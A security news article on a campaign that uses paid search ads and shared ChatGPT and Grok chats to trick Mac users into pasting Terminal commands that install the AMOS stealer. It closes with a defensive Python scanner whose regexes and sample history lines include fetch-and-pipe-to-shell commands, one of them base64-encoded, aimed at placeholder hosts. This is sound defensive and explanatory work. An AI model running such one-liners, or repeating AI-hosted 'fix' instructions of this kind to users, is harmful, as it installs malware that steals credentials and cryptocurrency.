In order to spread the Atomic macOS Stealer (AMOS), cybercriminals have created a sophisticated attack campaign that takes advantage of users' faith in artificial intelligence platforms. This represents a risky advancement in social engineering techniques. In order to trick unwary Mac users into running malicious terminal commands that compromise their systems, this new threat combines paid Google advertising with genuine AI chatbot services from ChatGPT and Grok.
The ad specifically targets people looking for standard troubleshooting fixes, like freeing up disk space on macOS, and reroutes them to instructions that appear to be genuine AI-generated content hosted on reliable domains. The attack method makes use of a technique called "ClickFix," in which users are duped into manually executing shell commands that cause malware to be downloaded and installed on their devices.
Because the malicious instructions are hosted on official ChatGPT and Grok websites rather than dubious third-party domains, this campaign is especially effective at getting around conventional security measures by seeming entirely authentic. As soon as the AMOS stealer runs, it starts gathering private data, such as browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and private files, and sends it all to servers under the attacker's control. According to Flare analysts, attackers create shareable AI chat links with detailed "installation guides" that pose as authentic macOS troubleshooting instructions.
Through paid advertising campaigns, these discussions are then elevated to the top of Google search results, guaranteeing optimal exposure when users look up frequently asked technical questions.
Because users naturally trust results that appear on trustworthy platforms such as the OpenAI and X.AI domains, along with the extra credibility that comes from showing up as sponsored Google search results, the social engineering component proves remarkably effective.

Mechanism of Attack and Infection Chain

The infection process starts when a Mac user searches Google for troubleshooting help using terms like "clear disk space on macOS" or similar technical queries. Through sponsored ads or highly ranked organic results, victims are directed to shared ChatGPT or Grok conversations that appear to provide useful system maintenance instructions.
The carefully constructed instructions in these AI-generated conversations tell users to launch the Terminal application and paste what seems to be a harmless command.
Under the pretense of normal system operations, the malicious command downloads a script from an outside domain under the attackers' control, which then repeatedly asks for the user's system password. Once the correct credentials are entered, the script installs the AMOS infostealer and a persistent backdoor that survives system reboots and grants long-term remote access to the compromised machine. Targeting cryptocurrency wallets such as Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, the malware immediately extracts seed phrases and private keys, allowing the instant theft of digital assets.
Furthermore, AMOS collects browser data from Chrome, Safari, and Firefox, including cookies, autofill data, saved passwords, and ongoing login sessions.
Businesses and individual Mac users should watch for unexpected network connections to unknown domains, unusual Terminal activity, and unsigned applications asking for system passwords. Security teams need to make users aware that instructions appearing on reliable AI platforms can themselves be the product of social engineering. Before following any guidance that asks for a Terminal command to be run, it should be independently confirmed through official support channels.
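One way a defender can act on the "unusual Terminal activity" indicator, as an added example that is not code from the article or from Flare: a small Python scanner that flags shell-history entries matching the ClickFix pattern the article describes, a pasted one-liner that fetches a script from an outside domain and hands it straight to an interpreter. The allowlisted host, the sample history lines and the use of sudo as a proxy for the password prompt are assumptions.

```python
import re

# Added example, not the article's or Flare's code; all domains are constructed placeholders.
FETCH = r"(?:curl|wget)\b[^|;&]*"                 # remote fetch, up to the next pipe
INTERP = r"(?:(?:ba|z|)sh|python3?|osascript)\b"  # interpreters that would run the result
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
RULES = {
    # "curl ... | sh": remote script executed without ever touching disk.
    "remote_fetch_piped_to_shell": re.compile(rf"{FETCH}\|\s*(?:sudo\s+)?{INTERP}"),
    # "echo <blob> | base64 -d | sh": the real command is hidden by encoding.
    "base64_decoded_into_shell": re.compile(
        rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{INTERP}"),
    # bash -c "$(curl ...)": the fetch is wrapped in command substitution.
    "fetch_in_command_substitution": re.compile(
        rf"{INTERP}\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
}
# Origins whose install one-liners are expected here (assumption: team-maintained; placeholder).
ALLOWLIST = {"internal-tools.example"}


def classify_command(cmd: str) -> list[str]:
    """Return the names of every heuristic a single shell command trips."""
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    if not hits:
        return []
    hosts = set(HOST.findall(cmd))
    if hosts and hosts <= ALLOWLIST:
        return []  # every origin is known-good: do not alert
    # The article says the fetched script prompts for the login password; sudo is a cheap proxy (assumption).
    if re.search(r"\bsudo\b", cmd):
        hits.append("asks_for_system_password")
    return hits


def scan_history(lines: list[str]) -> list[dict]:
    """Report shell-history lines that look like pasted ClickFix lures."""
    findings = []
    for n, line in enumerate(lines, 1):
        # zsh EXTENDED_HISTORY entries look like ": 1700000000:0;<command>"
        cmd = (line.split(";", 1)[1] if line.startswith(": ") else line).strip()
        if reasons := classify_command(cmd):
            findings.append({"line": n, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample history, not real data.
SAMPLE_HISTORY = [
    "df -h",
    ": 1700000000:0;curl -fsSL https://internal-tools.example/setup.sh | bash",
    "curl -fsSL https://free-up-disk.example/fix.sh | sudo bash",
    "echo Y3VybCBodHRwczovL2V4YW1wbGUuaW52YWxpZCB8IHNo | base64 -D | zsh",
]
```

Legitimate installers use the same shape of command, so the allowlist is what keeps this from paging on every package-manager bootstrap; the heuristics are a triage signal, not proof of compromise.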